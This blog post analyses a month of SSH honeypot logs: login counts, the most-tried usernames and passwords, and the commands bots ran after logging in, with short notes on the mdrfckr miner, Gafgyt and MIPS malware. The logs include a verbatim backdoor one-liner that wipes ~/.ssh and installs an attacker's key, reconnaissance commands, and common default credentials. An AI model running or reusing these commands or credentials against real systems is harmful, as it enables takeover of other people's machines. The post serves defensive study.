https://blog.sofiane.cc/ssh_honeypot/

   

  * Home
  * Writing
  * Projects
  * Lessons
  * Search
  * Categories
  * FR
  * RU


  *  
  *  
  *  
  *  

Previous post Next post Back to top Share post

  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  

 1. 1. What is a honeypot?
 2. 2. Environment
 3. 3. Login Attempts
 4. 4. Used Usernames
     1. 4.1. Passwords
     2. 4.2. Commands executed after login
     3. 4.3. The oinasf script
     4. 4.4. The mdrfckr crypto miner
     5. 4.5. The MIPS malware
     6. 4.6. The Sakura.sh Script
 5. 5.  Connect with me

What You Get After Running an SSH Honeypot for 30 Days

Sofiane
2024-02-15
CyberSecurity > Authentication
BASHLITE, CyberSecurity, Gafgyt, MIPS, SofianeHamlaoui, mdrfkr,
oinasf

[5PZ4c8k]

 What is a honeypot?

A honeypot detects and records attacks when an attacker tries to
break into a system.

The honeypot we will discuss here is an SSH honeypot.

 Environment

1 OS: Ubuntu 24.04 LTS x86_64 
2 Kernel: 6.8.0-31-generic

 Login Attempts

1 cat X.log | grep -c "login attempt"
2 11599

There were a total of 11,599 login attempts. Divided by 30 days, this
means an average of 386 login attempts per day.

 Used Usernames

1  cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
2     8181 root
3      977 345gs5662d34
4      359 admin
5      198 pi
6      105 0
7       71 ubuntu
8       51 ubnt
9       46 support
10      37 user
11      30 oracle

As expected, there are many attacks that target customary and default
usernames.

For the 345gs5662d34 user, according to the Aalborg University of
Denmark Research this could be the default credential for a Polycom
CX600 IP telephone

Check it here :
SweetCam: an IP Camera Honeypot

 Passwords

1  cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
2      977 345gs5662d34
3      967 3245gs5662d34
4      246 admin
5      239 123456
6      208 password
7      155 0
8       88 root
9       75 raspberry
10      73 123
11      66 raspberryraspberry993311

Once again, the same as the default username for Polycom CX600 IP
telephone

 Commands executed after login

1  cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
2     6775 echo -e "\x6F\x6B"
3     1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
4     1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
5      320 uname -s -v -n -r -m
6      112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
7       87 uname -a
8       29 ps | grep '[Mm]iner'
9       29 ps -ef | grep '[Mm]iner'
10      29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
11      29 ifconfig
12      29 echo Hi | cat -n
13      29 cat /proc/cpuinfo
14      29 /ip cloud print
15      23 whoami
16      23 which ls
17      23 w
18      23 uname -m
19      23 uname
20      23 top
21      23 lscpu | grep Model
22      23 ls -lh $(which ls)
23      23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
24      23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
25      23 crontab -l
26      23 cat /proc/cpuinfo | grep name | wc -l
27      23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
28      23 cat /proc/cpuinfo | grep model | grep name | wc -l
29      

Now the interesting part starts

 The oinasf script

[7YmVqRo]

The execution of a mysterious script, ./oinasf, followed by attempts
to read and display the system's executable content, indicates a
probing strategy for vulnerabilities or valuable information.

The use of /ip cloud print suggests that bots target MikroTik routers
to access or disrupt cloud-based services, while uname -s -m provides
them with essential details about the operating system and machine
architecture, valuable for crafting further actions tailored to the
system's specifics.

In conclusion, these commands represent a clear strategy to
infiltrate, assess, and establish control over targeted systems.

They emphasize the bot's preference for direct manipulation and
sustained access highlighting the critical need for robust defenses
against such common yet potentially devastating tactics.

 The mdrfckr crypto miner

[V6E9UiA]

This miner would simply create a cron job that would delete
everything on the .ssh folder and add a single ssh key and lock other
users out.

After that it would kill other miners if they exist and just have the
open field.

You can check this repo of someone who already got hacked and the
miner was used on his server : Dump of the crypto-miner that got
installed on my system - Github

 The MIPS malware

[BkHTVej]

Probably another MIPS (Multiprocessor without Interlocked Pipeline
Stages) architecture malware, targeting routers and IoT devices.

Here is a good read and analysis of the behaviour of a MIPS Malware :
Analyzing a Backdoor/Bot for the MIPS Platform

 The Sakura.sh Script

[GmR2OvK]

This script is part of the Gafgyt Malware.

Gafgyt, also known as BASHLITE, is a botnet affecting Internet of
Things (IoT) devices and Linux-based systems. The malware aims to
compromise and gain control of these devices, often by exploiting
weak or default passwords, as well as known vulnerabilities. Gafgyt
has been around since 2014 and has evolved into multiple variants,
each with its own set of features and capabilities, including the
ability to launch distributed denial of service (DDoS) attacks.

Here is A Detailed Analysis of the Gafgyt Malware Targeting IoT
Devices

(c) 2024 -- Sofiane Hamlaooui -- Making the world a better place 

  Connect with me

                                 ##

  * Home
  * Writing
  * Projects
  * Lessons
  * Search
  * Categories
  * FR
  * RU

 1. 1. What is a honeypot?
 2. 2. Environment
 3. 3. Login Attempts
 4. 4. Used Usernames
     1. 4.1. Passwords
     2. 4.2. Commands executed after login
     3. 4.3. The oinasf script
     4. 4.4. The mdrfckr crypto miner
     5. 4.5. The MIPS malware
     6. 4.6. The Sakura.sh Script
 5. 5.  Connect with me

  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  
  *  

Menu TOC Share Top
Copyright (c) 2012-2024 Sofiane Hamlaoui

  * Home
  * Writing
  * Projects
  * Lessons
  * Search
  * Categories
  * FR
  * RU